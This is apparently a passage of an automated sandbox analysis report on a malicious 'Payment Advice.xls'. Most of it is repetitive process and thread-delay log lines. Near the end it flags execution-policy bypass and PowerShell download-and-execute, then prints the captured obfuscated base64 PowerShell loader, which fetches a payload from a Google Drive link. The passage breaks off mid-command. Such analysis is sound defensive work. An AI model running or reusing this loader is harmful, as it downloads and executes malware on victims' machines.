              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: Payment Advice.xlsStream path 'Workbook' entropy: 7.99857678169 (max. 8.0)
              Source: A5330000.0.drStream path 'Workbook' entropy: 7.99866585322 (max. 8.0)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5746Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1548Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2022Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5681Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2020Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1815Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8004Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1702
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3825
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2210
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1308
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1111
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 419
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1248
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8602
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1nxbdaco\1nxbdaco.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vbdaauwq\vbdaauwq.dllJump to dropped file
              Source: C:\Windows\System32\mshta.exe TID: 3676Thread sleep time: -360000s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3840Thread sleep time: -120000s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3936Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3812Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3876Thread sleep count: 2022 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3876Thread sleep count: 5681 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3912Thread sleep time: -120000s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3916Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3856Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3152Thread sleep count: 291 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3152Thread sleep count: 2020 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2952Thread sleep time: -60000s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3036Thread sleep count: 1815 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3036Thread sleep count: 8004 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1980Thread sleep time: -60000s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2084Thread sleep time: -11068046444225724s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2084Thread sleep time: -2400000s >= -30000sJump to behavior
              Source: C:\Windows\System32\mshta.exe TID: 1264Thread sleep time: -120000s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3056Thread sleep count: 1702 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3056Thread sleep count: 3825 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1012Thread sleep time: -240000s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1376Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3192Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 936Thread sleep count: 2210 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2948Thread sleep count: 1308 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3416Thread sleep time: -120000s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3408Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2916Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3856Thread sleep time: -60000s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3848Thread sleep count: 1248 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3892Thread sleep count: 8602 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3948Thread sleep time: -60000s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3944Thread sleep time: -11068046444225724s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3944Thread sleep time: -600000s >= -30000s
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 3524Thread sleep time: -120000s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 60000
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: Debug

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3740, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2692, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1472, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3860, type: MEMORYSTR
              Bypasses PowerShell execution policy
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR2VULVZhcmlhYmxFICcqTURSKicpLm5BbUVbMywxMSwyXS1KT2lOJycpICgoJ3dWVWltYWdlVXJsID0gU3FwaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3cnKydubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlUnKydoQll3dXIgJysnU3FwO3dWVXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7d1ZVaW1hZ2VCeXRlcyA9ICcrJ3dWVXdlYkNsaWVudC5Eb3dubG9hZERhdGEnKycod1ZVaW1hZ2VVcmwpO3dWVWltYWdlJysnVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVUJysnRjgnKycuR2V0U3RyaW5nKHdWVWltYWdlQnl0ZXMpO3dWVXN0YXJ0RmxhZyA9IFNxcDw8QkFTRTY0X1NUQVJUPj5TcXA7d1ZVZW5kRmxhZyA9IFNxcDw8QkFTRTY0X0VORD4+U3FwO3dWVXN0YXJ0SW5kJysnZXggPSB3VlVpbWFnZScrJ1RleHQuSW5kZXhPZih3VlVzdGFydEZsJysnYWcpO3dWVWVuJysnZEluZGV4ID0gd1ZVaW1hZ2VUZXh0LkluZGUnKyd4T2Yod1ZVZW5kRmxhZyk7d1ZVc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIHdWVWVuZEluZGV4ICcrJy1ndCB3VlVzdGFydEluZGV4O3dWVXN0YXJ0SW5kZXggJysnKz0gd1ZVc3RhcnRGbGFnLkxlbmd0aDt3VlViYXNlJysnNjRMZW5ndGggPSB3VlVlbmRJbmRleCAtIHdWVXN0YXJ0SW5kZXg7d1ZVYmFzZTY0Q28nKydtbWFuZCA9IHdWVWltYWdlVGV4dC5TdWJzdHJpbmcod1ZVc3RhcnRJbmRleCcrJywgd1ZVYmFzZScrJzY0TGVuZ3RoKTt3VlViYXNlNjRSZXZlcnNlZCA9IC1qb2luICh3VlViYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgalZUJysnIEZvckVhY2gtT2JqZWN0IHsgd1ZVXyB9KVstMS4uLS